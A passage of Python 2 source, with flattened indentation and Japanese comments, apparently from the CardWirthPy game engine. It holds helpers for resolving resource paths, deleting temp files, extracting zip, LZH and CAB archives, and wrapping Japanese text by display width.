"Data/Temp/Yado"にパスが存在すれば、そちらを優先させる。
"""
temppath = join_paths(cw.cwpy.tempdir, path)
yadopath = join_paths(cw.cwpy.yadodir, path)
if os.path.exists(temppath):
return temppath
else:
return yadopath
def get_yadofilepath(path):
""""Data/Yado"もしくは"Data/Temp/Yado"のファイルパスの存在チェックをかけ、
存在しているパスを返す。存在していない場合は""を返す。
"Data/Temp/Yado"にパス優先。
"""
if not cw.cwpy.ydata:
return ""
elif path.startswith(cw.cwpy.tempdir):
temppath = path
yadopath = path.replace(cw.cwpy.tempdir, cw.cwpy.yadodir, 1)
elif path.startswith(cw.cwpy.yadodir):
temppath = path.replace(cw.cwpy.yadodir, cw.cwpy.tempdir, 1)
yadopath = path
else:
return ""
if yadopath in cw.cwpy.ydata.deletedpaths:
return ""
elif os.path.isfile(temppath):
return temppath
elif os.path.isfile(yadopath):
return yadopath
else:
return ""
def find_resource(path, mtype):
"""pathとmtypeに該当する素材を拡張子の優先順に沿って探す。"""
imgpath = ""
if mtype == cw.M_IMG:
t = (".png", ".bmp", ".gif", ".jpg")
elif mtype == cw.M_MSC:
t = (".ogg", ".mp3", ".mid", ".wav")
elif mtype == cw.M_SND:
t = (".wav", ".ogg", ".mp3", ".mid")
else:
assert False, mtype
if os.path.normcase("A") <> os.path.normcase("a"):
seq = []
for t2 in t[:]:
seq.append(t2)
seq.append(t2.upper())
t = seq
for ext in t:
path2 = path + ext
if cw.cwpy:
path2 = cw.cwpy.rsrc.get_filepath(path2)
if os.path.isfile(path2):
return path2
if is_descendant(path, cw.cwpy.skindir):
path = join_paths("Data/SkinBase", relpath(path, cw.cwpy.skindir))
return find_resource(path, mtype)
return u""
def get_inusecardmaterialpath(path, mtype, inusecard=None, findskin=True):
"""pathが宿からシナリオへ持ち込んだカードの
素材を指していればそのパスを返す。
そうでない場合は空文字列を返す。"""
imgpath = ""
if cw.cwpy.event.in_inusecardevent:
if inusecard or (cw.cwpy.is_runningevent() and cw.cwpy.event.get_inusecard()):
if not inusecard:
inusecard = cw.cwpy.event.get_inusecard()
if not inusecard.carddata.getbool(".", "scenariocard", False) or\
inusecard.carddata.gettext("Property/Materials", ""):
imgpath = cw.util.join_yadodir(path)
imgpath = get_materialpathfromskin(imgpath, mtype, findskin=findskin)
return imgpath
def get_materialpath(path, mtype, scedir="", system=False, findskin=True):
"""pathが指す素材を、シナリオプレイ中はシナリオ内から探し、
プレイ中でない場合や存在しない場合はスキンから探す。
path: 素材の相対パス。
type: 素材のタイプ。cw.M_IMG, cw.M_MSC, cw.M_SNDのいずれか。
"""
if mtype == cw.M_IMG and cw.binary.image.path_is_code(path):
return path
if not system and (cw.cwpy.is_playingscenario() or scedir):
tpath = cw.util.join_paths(cw.tempdir, u"ScenarioLog/TempFile", path)
tpath = cw.cwpy.rsrc.get_filepath(tpath)
if os.path.isfile(tpath):
path = tpath
else:
if not scedir:
scedir = cw.cwpy.sdata.scedir
path = cw.util.join_paths(scedir, path)
path = cw.cwpy.rsrc.get_filepath(path)
else:
path = cw.cwpy.rsrc.get_filepath(path)
if not os.path.isfile(path):
path = cw.util.join_paths(cw.cwpy.skindir, path)
return get_materialpathfromskin(path, mtype, findskin=findskin)
def get_materialpathfromskin(path, mtype, findskin=True):
if not os.path.isfile(path):
if not findskin:
path = ""
elif path.startswith(cw.cwpy.skindir):
fname = cw.util.splitext(path)[0]
if mtype == cw.M_IMG:
path2 = cw.util.find_resource(fname, cw.cwpy.rsrc.ext_img)
elif mtype == cw.M_MSC:
path2 = cw.util.find_resource(fname, cw.cwpy.rsrc.ext_bgm)
elif mtype == cw.M_SND:
path2 = cw.util.find_resource(fname, cw.cwpy.rsrc.ext_snd)
if path2:
return path2
fname = os.path.basename(path)
lfname = fname.lower()
eb = lfname.endswith(".jpy1") or lfname.endswith(".jptx") or lfname.endswith(".jpdc")
if not eb:
fname = cw.util.splitext(fname)[0]
dpaths = [cw.cwpy.skindir]
if os.path.isdir(u"Data/Materials"):
dpaths.extend(map(lambda d: cw.util.join_paths(u"Data/Materials", d), os.listdir(u"Data/Materials")))
for dpath in dpaths:
if eb:
# エフェクトブースターのファイルは他の拡張子への付替を行わない
path = cw.cwpy.rsrc.get_filepath(cw.util.join_paths(dpath, "Table", fname))
elif mtype == cw.M_IMG:
path = cw.util.find_resource(cw.util.join_paths(dpath, "Table", fname), cw.cwpy.rsrc.ext_img)
elif mtype == cw.M_MSC:
path = cw.util.find_resource(cw.util.join_paths(dpath, "Bgm", fname), cw.cwpy.rsrc.ext_bgm)
if not path:
path = cw.util.find_resource(cw.util.join_paths(dpath, "BgmAndSound", fname), cw.cwpy.rsrc.ext_bgm)
elif mtype == cw.M_SND:
path = cw.util.find_resource(cw.util.join_paths(dpath, "Sound", fname), cw.cwpy.rsrc.ext_snd)
if not path:
path = cw.util.find_resource(cw.util.join_paths(dpath, "BgmAndSound", fname), cw.cwpy.rsrc.ext_snd)
if path:
break
return path
def remove_temp():
"""
一時ディレクトリを空にする。
"""
dpath = cw.tempdir
if not os.path.exists(dpath):
os.makedirs(dpath)
removeall = True
for name in os.listdir(dpath):
if name in ("Scenario", "LockFiles"):
removeall = False
else:
path = join_paths(dpath, name)
try:
remove(path)
except:
print_ex()
remove_treefiles(path)
if removeall and cw.tempdir <> cw.tempdir_init:
try:
remove(cw.tempdir)
except:
print_ex()
remove_treefiles(cw.tempdir)
try:
remove(u"Data/Temp/Global/Deleted")
except:
pass
def remove(path, trashbox=False):
if os.path.isfile(path):
remove_file(path, trashbox=trashbox)
elif os.path.isdir(path):
if join_paths(path).lower().startswith("data/temp/") and not trashbox:
# Tempフォルダは、フォルダの内容さえ消えていれば
# 空フォルダが残っていてもほとんど無害
try:
remove_treefiles(path, trashbox=trashbox)
remove_tree(path, noretry=True, trashbox=trashbox)
except:
# まれにフォルダ削除に失敗する環境がある
#print_ex(file=sys.stderr)
print_ex()
remove_treefiles(path, trashbox=trashbox)
else:
if trashbox:
try:
remove_tree(path, trashbox=trashbox)
except:
print_ex()
remove_treefiles(path, trashbox=trashbox)
remove_tree(path, trashbox=trashbox)
else:
remove_treefiles(path, trashbox=trashbox)
remove_tree(path, trashbox=trashbox)
def remove_file(path, retry=0, trashbox=False):
try:
if trashbox:
send_trashbox(path)
else:
os.remove(path)
except WindowsError, err:
if err.errno == 13 and retry < 5:
os.chmod(path, stat.S_IWRITE|stat.S_IREAD)
remove_file(path, retry + 1, trashbox=trashbox)
elif retry < 5:
time.sleep(1)
remove_tree(path, retry + 1, trashbox=trashbox)
else:
raise err
def add_winauth(file):
if os.path.isfile(file) and sys.platform == "win32":
os.chmod(file, stat.S_IWRITE|stat.S_IREAD)
def remove_tree(treepath, retry=0, noretry=False, trashbox=False):
try:
if trashbox:
send_trashbox(treepath)
else:
shutil.rmtree(treepath)
except WindowsError, err:
if err.errno == 13 and retry < 5 and not noretry:
for dpath, dnames, fnames in os.walk(treepath):
for dname in dnames:
path = join_paths(dpath, dname)
if os.path.isdir(path):
try:
os.chmod(path, stat.S_IWRITE|stat.S_IREAD)
except WindowsError, err:
time.sleep(1)
remove_tree2(treepath, trashbox=trashbox)
return
for fname in fnames:
path = join_paths(dpath, fname)
if os.path.isfile(path):
try:
os.chmod(path, stat.S_IWRITE|stat.S_IREAD)
except WindowsError, err:
time.sleep(1)
remove_tree2(treepath, trashbox=trashbox)
return
remove_tree(treepath, retry + 1, trashbox=trashbox)
elif retry < 5 and not noretry:
time.sleep(1)
remove_tree(treepath, retry + 1, trashbox=trashbox)
else:
remove_tree2(treepath, trashbox=trashbox)
def remove_tree2(treepath, trashbox=False):
# shutil.rmtree()で権限付与時にエラーになる事があるので
# 削除方法を変えてみる
for dpath, dnames, fnames in os.walk(treepath, topdown=False):
for dname in dnames:
path = join_paths(dpath, dname)
if os.path.isdir(path):
os.rmdir(path)
for fname in fnames:
path = join_paths(dpath, fname)
if os.path.isfile(path):
if trashbox:
send_trashbox(path)
else:
os.remove(path)
os.rmdir(treepath)
def remove_treefiles(treepath, trashbox=False):
# remove_tree2()でもたまにエラーになる環境があるらしいので、
# せめてディレクトリだけでなくファイルだけでも削除を試みる
for dpath, dnames, fnames in os.walk(treepath, topdown=False):
for fname in fnames:
path = join_paths(dpath, fname)
if os.path.isfile(path):
add_winauth(path)
if trashbox:
send_trashbox(path)
else:
os.remove(path)
def rename_file(path, dstpath, trashbox=False):
"""pathをdstpathへ移動する。
すでにdstpathがある場合は上書きされる。
"""
if not os.path.isdir(os.path.dirname(dstpath)):
os.makedirs(os.path.dirname(dstpath))
if os.path.isfile(dstpath):
remove_file(dstpath, trashbox=trashbox)
try:
shutil.move(path, dstpath)
except OSError:
# ファイルシステムが異なっていると失敗する
# 可能性があるのでコピー&削除を試みる
print_ex()
with open(path, "rb") as f1:
with open(dstpath, "wb") as f2:
f2.write(f1.read())
f2.flush()
f2.close()
f1.close()
remove_file(path, trashbox=trashbox)
def send_trashbox(path):
"""
可能であればpathをゴミ箱へ送る。
"""
if sys.platform == "win32":
path = os.path.normpath(os.path.abspath(path))
ope = win32com.shell.shellcon.FO_DELETE
flags = win32com.shell.shellcon.FOF_NOCONFIRMATION |\
win32com.shell.shellcon.FOF_ALLOWUNDO |\
win32com.shell.shellcon.FOF_SILENT
win32com.shell.shell.SHFileOperation((None, ope, path + '\0\0', None, flags, None, None))
elif os.path.isfile(path):
os.remove(path)
elif os.path.isdir(path):
shutil.rmtree(path)
def remove_emptydir(dpath):
"""
dpathが中身の無いディレクトリであれば削除する。
"""
if os.path.isdir(dpath):
for dpath2, dnames, fnames in os.walk(dpath):
if len(fnames):
# 中身が存在する
return
remove(dpath)
OVERWRITE_ALWAYS = 0
NO_OVERWRITE = 1
OVERWRITE_WITH_LATEST_FILES = 2
#-------------------------------------------------------------------------------
# ZIPファイル関連
#-------------------------------------------------------------------------------
class _LhafileWrapper(lhafile.Lhafile):
def __init__(self, path, mode):
# 十六進数のファイルサイズを表す文字列+Windows改行コードが
# 冒頭に入っていることがある。
# その場合は末尾にも余計なデータもあるため、冒頭で指定された
# サイズにファイルを切り詰めなくてはならない。
f = open(path, "rb")
b = str(f.read(1))
strnum = []
while b in ("0123456789abcdefABCDEF"):
strnum.append(b)
b = str(f.read(1))
if strnum and b == '\r' and f.read(1) == '\n':
strnum = "".join(strnum)
num = int(strnum, 16)
data = f.read(num)
f.close()
f = io.BytesIO(data)
lhafile.Lhafile.__init__(self, f)
self.f = f
else:
f.seek(0)
lhafile.Lhafile.__init__(self, f)
self.f = f
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def close(self):
self.f.close()
def zip_file(path, mode):
"""zipfile.ZipFileのインスタンスを生成する。
FIXME: Python 2.7のzipfile.ZipFileはアーカイブ内の
ファイル名にあるディレクトリセパレータを'/'に置換してしまうため、
「ソ」などのいわゆるShift JISの0x5C問題に引っかかって
正しいファイル名が得られなくなってしまう。
まったくスレッドセーフではない悪い方法だが、
それを回避するには一時的にos.sepを'/'にして凌ぐしかない。"""
if path.lower().endswith(".lzh"):
return _LhafileWrapper(path, mode)
else:
sep = os.sep
os.sep = "/"
try:
return zipfile.ZipFile(path, mode)
finally:
os.sep = sep
def compress_zip(path, zpath, unicodefilename=False):
"""pathのデータをzpathで指定したzipファイルに圧縮する。
path: 圧縮するディレクトリパス
"""
if not unicodefilename:
encoding = sys.getfilesystemencoding()
dpath = os.path.dirname(zpath)
if dpath and not os.path.isdir(dpath):
os.makedirs(dpath)
z = zipfile.ZipFile(zpath, "w", zipfile.ZIP_DEFLATED)
rpl_dir = path + "/"
for dpath, dnames, fnames in os.walk(unicode(path)):
for dname in dnames:
fpath = join_paths(dpath, dname)
if os.path.isdir(fpath):
mtime = time.localtime(os.path.getmtime(fpath))[:6]
zname = fpath.replace(rpl_dir, "", 1) + "/"
zinfo = zipfile.ZipInfo(zname, mtime)
if unicodefilename:
zinfo.flag_bits |= 0x800
z.writestr(zinfo, "")
for fname in fnames:
fpath = join_paths(dpath, fname)
if os.path.isfile(fpath):
zname = fpath.replace(rpl_dir, "", 1)
if unicodefilename:
z.write(fpath, zname)
else:
z.write(fpath, zname.encode(encoding))
z.close()
return zpath
def decompress_zip(path, dstdir, dname="", startup=None, progress=None, overwrite=False):
"""zipファイルをdstdirに解凍する。
解凍したディレクトリのpathを返す。
"""
try:
z = zip_file(path, "r")
except:
return None
if not dname:
dname = splitext(os.path.basename(path))[0]
if overwrite:
paths = set()
else:
dstdir = join_paths(dstdir, dname)
dstdir = dupcheck_plus(dstdir, False)
seq = z.infolist()
if startup:
startup(len(seq))
for i, (zname, info) in enumerate(zip(z.namelist(), z.infolist())):
if progress and i % 10 == 0:
if progress(i):
if overwrite:
break
else:
z.close()
remove(dstdir)
return
name = decode_zipname(zname).replace('\\', '/')
normpath = os.path.normpath(name)
if os.path.isabs(normpath):
continue
if normpath == ".." or normpath.startswith(".." + os.path.sep):
continue
if name.endswith("/"):
name = name.rstrip("/")
dpath = join_paths(dstdir, name)
if dpath and not os.path.isdir(dpath):
os.makedirs(dpath)
else:
fpath = join_paths(dstdir, name)
dpath = os.path.dirname(fpath)
if dpath and not os.path.isdir(dpath):
os.makedirs(dpath)
if isinstance(info.date_time, datetime.datetime):
mtime = time.mktime(time.strptime(info.date_time.strftime("%Y/%m/%d %H:%M:%S"), "%Y/%m/%d %H:%M:%S"))
else:
mtime = time.mktime(time.strptime("%d/%02d/%02d %02d:%02d:%02d" % (info.date_time), "%Y/%m/%d %H:%M:%S"))
if overwrite:
# 上書き展開時は一部ファイルでエラーが出た場合に
# 上書き先を改名して対処する
# (再生中のBGMが上書きできない場合など)
paths.add(os.path.normcase(os.path.normpath(os.path.abspath(fpath))))
if not os.path.isfile(fpath) or os.path.getmtime(fpath) <> mtime:
data = z.read(zname)
try:
with open(fpath, "wb") as f:
f.write(data)
f.flush()
f.close()
except:
# 改名してリトライ
if os.path.isfile(fpath):
dst = join_paths(u"Data/Temp/Global/Deleted", os.path.basename(fpath))
dst = dupcheck_plus(dst, False)
if not os.path.isdir(u"Data/Temp/Global/Deleted"):
os.makedirs(u"Data/Temp/Global/Deleted")
rename_file(fpath, dst)
with open(fpath, "wb") as f:
f.write(data)
f.flush()
f.close()
else:
continue
else:
data = z.read(zname)
with open(fpath, "wb") as f:
f.write(data)
f.flush()
f.close()
os.utime(fpath, (os.path.getatime(fpath), mtime))
z.close()
if overwrite:
for dpath, _dnames, fnames in os.walk(dstdir):
for fname in fnames:
path = join_paths(dpath, fname)
path = os.path.normcase(os.path.normpath(os.path.abspath(path)))
if not path in paths:
remove(path)
if progress:
progress(len(seq))
return dstdir
def decode_zipname(name):
if not isinstance(name, unicode):
try:
name = name.decode("utf_8_sig")
except UnicodeDecodeError:
try:
name = name.decode(cw.MBCS)
except UnicodeDecodeError:
try:
name = name.decode("euc-jp")
except UnicodeDecodeError:
try:
name = name.decode("utf-8")
except UnicodeDecodeError:
try:
name = name.decode("utf-16")
except UnicodeDecodeError:
try:
name = name.decode("utf-32")
except UnicodeDecodeError:
name = name
return name
def decode_text(name):
if not isinstance(name, unicode):
try:
name = name.decode("utf_8_sig")
except UnicodeDecodeError:
try:
name = name.decode("utf-8")
except UnicodeDecodeError:
try:
name = name.decode("utf-16")
except UnicodeDecodeError:
try:
name = name.decode("utf-32")
except UnicodeDecodeError:
try:
name = name.decode(cw.MBCS)
except UnicodeDecodeError:
try:
name = name.decode("euc-jp")
except UnicodeDecodeError:
name = name
return name
def read_zipdata(zfile, name):
try:
data = zfile.read(name)
except KeyError:
try:
data = zfile.read(name.encode(cw.MBCS))
except KeyError:
try:
data = zfile.read(name.encode("euc-jp"))
except KeyError:
try:
data = zfile.read(name.encode("utf-8"))
except KeyError:
data = ""
return data
def get_elementfromzip(zpath, name, tag=""):
with zip_file(zpath, "r") as z:
data = read_zipdata(z, name)
z.close()
f = StringIO.StringIO(data)
try:
element = cw.data.xml2element(name, tag, stream=f)
finally:
f.close()
return element
def decompress_cab(path, dstdir, dname="", startup=None, progress=None, overwrite=False):
"""cabファイルをdstdirに解凍する。
解凍したディレクトリのpathを返す。
"""
if not dname:
dname = splitext(os.path.basename(path))[0]
if not overwrite:
dstdir = join_paths(dstdir, dname)
dstdir = dupcheck_plus(dstdir, False)
if overwrite and os.path.isdir(dstdir):
# 強制的に全てのファイルを展開するため、
# 元々あったファイルを削除するか、削除予定地へ転送する
for dpath, _dnames, fnames in os.walk(dstdir):
for fname in fnames:
fpath = join_paths(dpath, fname)
dst = join_paths(u"Data/Temp/Global/Deleted", fname)
if not os.path.isdir(u"Data/Temp/Global/Deleted"):
os.makedirs(u"Data/Temp/Global/Deleted")
dst = dupcheck_plus(dst)
rename_file(fpath, dst)
remove(dst)
if startup or progress:
filenum = cab_filenum(path)
if startup:
startup(filenum)
try:
if not os.path.isdir(dstdir):
os.makedirs(dstdir)
ss = []
if sys.platform == "win32" and sys.getwindowsversion().major <= 5:
# バージョン5以前の`expand.exe`は`-f:*`でディレクトリ構造を無視してしまう
for dname in cab_dpaths(path):
if not dname:
continue
dstdir2 = cw.util.join_paths(dstdir, dname)
if not os.path.isdir(dstdir2):
os.makedirs(dstdir2)
ss.append("expand \"%s\" -f:\"%s\\*\" \"%s\"" % (path, dname, dstdir2))
ss.append("expand \"%s\" -f:\"*\" \"%s\"" % (path, dstdir))
else:
ss.append("expand \"%s\" -f:* \"%s\"" % (path, dstdir))
encoding = sys.getfilesystemencoding()
if progress:
class Progress(object):
def __init__(self):
self.result = None
self.cancel = False
def run(self):
for s in ss:
p = subprocess.Popen(s.encode(encoding), shell=True, close_fds=True)
r = p.poll()
while r is None:
if self.cancel:
p.kill()
time.sleep(0.001)
r = p.poll()
if r <> 0:
return # 失敗
self.result = dstdir
prog = Progress()
thr = threading.Thread(target=prog.run)
thr.start()
count = 0
while thr.is_alive():
# ファイル数カウント
last_count = count
count = 0
for dpath, _dnames, fnames in os.walk(dstdir):
count += len(fnames)
if last_count <> count:
if progress(count):
prog.cancel = True
p = time.time() + 0.1
while thr.is_alive() and time.time() < p:
time.sleep(0.001)
if prog.cancel and not overwrite:
remove(dstdir)
return None
else:
for s in ss:
if subprocess.call(s.encode(encoding), shell=True, close_fds=True) <> 0:
return None
except Exception:
cw.util.print_ex()
return None
if progress:
progress(filenum)
return dstdir
def cab_filenum(cab):
"""CABアーカイブに含まれるファイル数を返す。"""
word = struct.Struct("<h")
try:
with io.BufferedReader(io.FileIO(cab, "rb")) as f:
# ヘッダ
buf = f.read(36)
f.close()
if buf[:4] <> "MSCF":
return 0
cfiles = word.unpack(buf[28:30])[0]
return cfiles
except Exception:
cw.util.print_ex()
return 0
def cab_hasfile(cab, fname):
"""CABアーカイブに指定された名前のファイルが含まれているか判定する。"""
if not os.path.isfile(cab):
return ""
dword = struct.Struct("<l")
word = struct.Struct("<h")
if isinstance(fname, (str, unicode)):
fname = os.path.normcase(fname)
else:
s = set()
for name in fname:
s.add(os.path.normcase(name))
fname = s
encoding = "cp932"
try:
with io.BufferedReader(io.FileIO(cab, "rb")) as f:
# ヘッダ
buf = f.read(36)
if buf[:4] <> "MSCF":
f.close()
return ""
cofffiles = dword.unpack(buf[16:20])[0]
cfiles = word.unpack(buf[28:30])[0]
f.seek(cofffiles)
for _i in xrange(cfiles):
buf = f.read(16)
attribs = word.unpack(buf[14:16])[0]
name = []
while True:
c = str(f.read(1))
if c == '\0':
break
name.append(c)
name = "".join(name)
_A_NAME_IS_UTF = 0x80
if not (attribs & _A_NAME_IS_UTF):
name = unicode(name, encoding)
if isinstance(fname, (str, unicode)):
if fname == os.path.normcase(os.path.basename(name)):
f.close()
return name
else:
if os.path.normcase(os.path.basename(name)) in fname:
f.close()
return name
f.close()
except Exception:
cw.util.print_ex()
return ""
def cab_dpaths(cab):
"""CABアーカイブ内のディレクトリのsetを返す。"""
if not os.path.isfile(cab):
return ""
dword = struct.Struct("<l")
word = struct.Struct("<h")
r = set()
encoding = "cp932"
try:
with io.BufferedReader(io.FileIO(cab, "rb")) as f:
# ヘッダ
buf = f.read(36)
if buf[:4] <> "MSCF":
f.close()
return ""
cofffiles = dword.unpack(buf[16:20])[0]
cfiles = word.unpack(buf[28:30])[0]
f.seek(cofffiles)
for _i in xrange(cfiles):
buf = f.read(16)
attribs = word.unpack(buf[14:16])[0]
name = []
while True:
c = str(f.read(1))
if c == '\0':
break
name.append(c)
name = "".join(name)
_A_NAME_IS_UTF = 0x80
if not (attribs & _A_NAME_IS_UTF):
name = unicode(name, encoding)
i = name.rfind(u"\\")
if i == -1:
r.add(u"")
else:
dname = name[:i]
r.add(dname)
f.close()
except Exception:
cw.util.print_ex()
return r
def cab_scdir(cab):
"""CABアーカイブ内でSummary.wsmまたは
Summary.xmlが含まれるフォルダを返す。
"""
fpath = cab_hasfile(cab, ("Summary.xml", "Summary.wsm"))
return os.path.dirname(fpath)
#-------------------------------------------------------------------------------
# テキスト操作関連
#-------------------------------------------------------------------------------
def encodewrap(s):
"""改行コードを\nに置換する。"""
r = []
if not s:
return u""
for c in s:
if c == '\\':
r.append("\\\\")
elif c == '\n':
r.append("\\n")
elif c == '\r':
pass
else:
r.append(c)
return "".join(r)
def decodewrap(s, code="\n"):
"""\nを改行コードに戻す。"""
if not s:
return u""
r = []
bs = False
for c in s:
if bs:
if c == 'n':
r.append(code)
elif c == '\\':
r.append('\\')
else:
r.append(c)
bs = False
elif c == '\\':
bs = True
else:
r.append(c)
return "".join(r)
def encodetextlist(arr):
"""arrを\n区切りの文字列にする。"""
return encodewrap("\n".join(arr))
def decodetextlist(s):
"""\n区切りの文字列を文字配列にする。"""
if not s:
return []
return decodewrap(s).split("\n")
def is_hw(unichr):
"""unichrが半角文字であればTrueを返す。"""
return not unicodedata.east_asian_width(unichr) in ('F', 'W', 'A')
def get_strlen(s):
return reduce(lambda a, b: a + b, map(lambda c: 1 if is_hw(c) else 2, s))
def slice_str(s, width, get_width=None):
"""
sをwidthの位置でスライスし、2つの文字列にして返す。
"""
s = unicode(s)
if not get_width:
get_width = get_strlen
left = []
leftlen = 0
for c in s:
clen = get_width(c)
if width < leftlen+clen:
break
left.append(c)
leftlen += clen
return u"".join(left), s[len(left):]
assert slice_str(u"ABC", 2) == (u"AB", u"C")
assert slice_str(u"ABCあ", 4) == (u"ABC", u"あ")
def rjustify(s, length, c):
slen = cw.util.get_strlen(s)
if slen < length:
s += c * (length - slen)
return s
def ljustify(s, length, c):
slen = cw.util.get_strlen(s)
if slen < length:
s = (c * (length - slen)) + s
return s
WRAPS_CHARS = u"。|、|,|、|。|.|)|」|』|〕|}|】"
def txtwrap(s, mode, width=30, wrapschars="", encodedtext=True, spcharinfo=None):
"""引数の文字列を任意の文字数で改行する(全角は2文字として数える)。
mode=1: カード解説。
mode=2: 画像付きメッセージ(台詞)用。
mode=3: 画像なしメッセージ用。
mode=4: キャラクタ情報ダイアログの解説文・張り紙説明用。
mode=5: 素質解説文用。
mode=6: メッセージダイアログ用。
"""
if mode == 1:
wrapschars = WRAPS_CHARS
width = 37
elif mode == 2:
wrapschars = ""
width = 32
elif mode == 3:
wrapschars = ""
width = 42
elif mode == 4:
wrapschars = WRAPS_CHARS
width = 37
elif mode == 5:
wrapschars = WRAPS_CHARS
width = 24
elif mode == 6:
wrapschars = WRAPS_CHARS
width = 48
if encodedtext:
# \\nを改行コードに戻す
s = cw.util.decodewrap(s)
# 行頭禁止文字集合
r_wchar = re.compile(wrapschars) if not mode in (2, 3) and wrapschars else None
# 特殊文字記号集合
re_color = "&[\x20-\x7E]"
r_spchar = re.compile("#.|" + re_color) if mode in (2, 3) else None
if spcharinfo is not None:
spcharinfo2 = []
cnt = 0
asciicnt = 0
wraped = False
skip = False
spchar = False
defspchar = False
wrapafter = False
seq = []
seqlen = 0
skipchars = ""
def seq_insert(index, char):
if index < 0:
index = len(seq) + index
seq.insert(index, char)
if spcharinfo is not None:
for i in reversed(xrange(len(spcharinfo2))):
spi = spcharinfo2[i]
if spi < index:
break
else:
spcharinfo2[i] += len(char)
def insert_wrap(index):
# 折り返しを追加
seq_insert(index, '\n')
if spcharinfo is not None:
# 折り返しが追加された位置を記憶しておく
if index < 0:
index = len(seq) + index
if index == len(seq):
spcharinfo2.append(seqlen)
else:
spcharinfo2.append(reduce(lambda l, s: l + len(s), seq[:index], 0))
for index, char in enumerate(s):
spchar2 = spchar
spchar = False
width2 = width
wrapafter2 = wrapafter
defspchar2 = defspchar
defspchar = False
if r_spchar and not defspchar2:
if skip:
if spcharinfo is not None and index in spcharinfo:
spcharinfo2.append(seqlen)
seq.append(char)
seqlen += len(char)
skip = False
if skipchars.startswith("#"):
cnt += len(char)
asciicnt = 0
if width+1 < cnt:
if not wrapafter:
insert_wrap(len(seq))
seqlen += len("\n")
cnt = 0
asciicnt = 0
wraped = False
wrapafter = True
continue
chars = char + get_char(s, index + 1)
if r_spchar.match(chars.lower()):
if spcharinfo is not None and index in spcharinfo:
spcharinfo2.append(seqlen)
if not chars.startswith("#") or\
not chars[:2].lower() in cw.cwpy.rsrc.specialchars or\
cw.cwpy.rsrc.specialchars[chars[:2].lower()][1]:
if width < cnt and chars.startswith("#"):
if not wrapafter:
insert_wrap(len(seq))
seqlen += len("\n")
cnt = 0
asciicnt = 0
seq.append(char)
seqlen += len(char)
skip = True
if chars.startswith("#"):
cnt += len(char)
skipchars = chars
continue
spchar = True
if not chars.startswith("&"):
wrapafter = False
defspchar = True
# 行頭禁止文字
if cnt == 0 and not wraped and r_wchar and r_wchar.match(char):
seq_insert(-1, char)
seqlen += len(char)
asciicnt = 0
wraped = True
# 改行記号
elif char == "\n":
if not wrapafter:
seq.append(char)
seqlen += len(char)
cnt = 0
asciicnt = 0
wraped = False
wrapafter = False
# 半角文字
elif is_hw(char):
seq.append(char)
seqlen += len(char)
cnt += 1
if not (mode in (2, 3) or (mode in (1, 4) and char == ' ')) and not (mode == 1 and index+1 < len(s) and not is_hw(s[index+1])):
asciicnt += 1
if spchar2 or not (mode in (2, 3) or (mode in (1, 4) and char == ' ')) or len(s) <= index+1 or is_hw(s[index+1]):
width2 += 1
wrapafter = False
# 行頭禁止文字・改行記号・半角文字以外
else:
seq.append(char)
seqlen += len(char)
cnt += 2
asciicnt = 0
wrapafter = False
if mode in (1, 2, 3) and index+1 < len(s) and is_hw(s[index+1]):
width2 += 1
# 互換動作: 1.28以降は行末に半角スペースがあると折り返し位置が変わる
# (イベントによるメッセージのみ)
if mode in (3, 4) or cw.cwpy.sdata and not cw.cwpy.sct.lessthan("1.20", cw.cwpy.sdata.get_versionhint()):
if not wrapafter2 and index+1 < len(s) and s[index+1] == " " and mode in (1, 2, 3, 4):
width2 += 1
asciicnt = 0
# 行折り返し処理
if not spchar and cnt > width2:
if defspchar2 and width2+1 < cnt:
index = -(cnt - (width+1))
if seq[-index] <> "\n":
insert_wrap(index)
seqlen += len("\n")
cnt = 1
elif width2 >= asciicnt > 0 and not defspchar2:
if not get_char(s, index + 1) == "\n" and seq[-asciicnt] <> "\n":
insert_wrap(-asciicnt)
seqlen += len("\n")
cnt = asciicnt
elif index + 1 <= len(s) or not get_char(s, index + 1) == "\n":
if index + 2 <= len(s) or not get_char(s, index + 2) == "\n":
insert_wrap(len(seq))
seqlen += len("\n")
wrapafter = True
cnt = 0
asciicnt = 0
wraped = False
if spcharinfo is not None:
spcharinfo.clear()
spcharinfo.update(spcharinfo2)
return "".join(seq).rstrip()
def _wordwrap_impl(s, width, get_width, open_chars, close_chars, startindex, resultindex, spcharinfo, spcharinfo2):
"""
sをwidthの幅で折り返す。
テキストの長さをは計る時にget_width(s)を使用する。
"""
s = unicode(s)
if not get_width:
get_width = get_strlen
iter = re.findall(u"[a-z0-9_]+|[a-zA-Z0-9_]+|.", s, re.I)
if spcharinfo is not None:
# 特殊文字と単語を分離しておく
iter2 = []
index = startindex
spc = None
for word in iter:
if spc:
iter2.append(spc + word[0])
if 1 < len(word):
iter2.append(word[1:])
spc = None
elif index in spcharinfo is not None:
spc = word
else:
iter2.append(word)
index += len(word)
assert spc is None
iter = iter2
lines = []
buf = []
buflen = 0
hw = get_width(u"#")
index = startindex
for word in iter:
# 特殊文字か?
is_spchar = spcharinfo is not None and index in spcharinfo
wordlen = get_width(word)
if width < buflen+wordlen:
def match_op(buf):
return not buf[1] and open_chars.find(buf[0]) <> -1
def match_cl(buf):
return not buf[1] and close_chars.find(buf[0]) <> -1
def match_last(bufs, matcher):
for i in xrange(len(bufs)):
buf = bufs[-(1+i)]
if buf[1] and buf[0][0] == '&':
continue
return matcher(buf)
return False
def match_op_last(bufs):
# bufsの末尾部分がopen_charsに該当する文字ならTrue
# ただし色変更の特殊文字は無視する
return match_last(bufs, match_op)
def match_cl_last(bufs):
# bufsの末尾部分がclose_charsに該当する文字ならTrue
# ただし色変更の特殊文字は無視する
return match_last(bufs, match_cl)
assert match_op_last([("[", False), ("&R", True), ("&R", True)])
assert match_op_last([("[", False)])
assert not match_op_last([("[", False), ("&R", False), ("&R", True)])
def append_word_wrap(buf, buflen, word):
# wordを強制的に折り返しながら行に加える
if is_spchar:
return buf, buflen, word
while width < buflen+get_width(word):
word2, word3 = slice_str(word, width-buflen, get_width)
if word2:
word2 += u"-"
buf.append((word2, False))
word = word3
lines.append(buf)
buf = []
buflen = 0
return [], 0, word
def break_before_openchar(buf2, buf, buflen, word):
# 行末禁止文字の位置まで遡って折り返す
while buf2 and match_op_last(buf2):
buf2 = buf2[:-1]
if buf2:
i = len(buf2)
lines.append(buf[:i])
buf = buf[i:]
buflen = sum(map(lambda s: get_width(s[0]), buf))
return buf, buflen, word
else:
return append_word_wrap(buf, buflen, word)
if 1 <= len(buf) and match_op_last(buf) and not match_cl_last(buf):
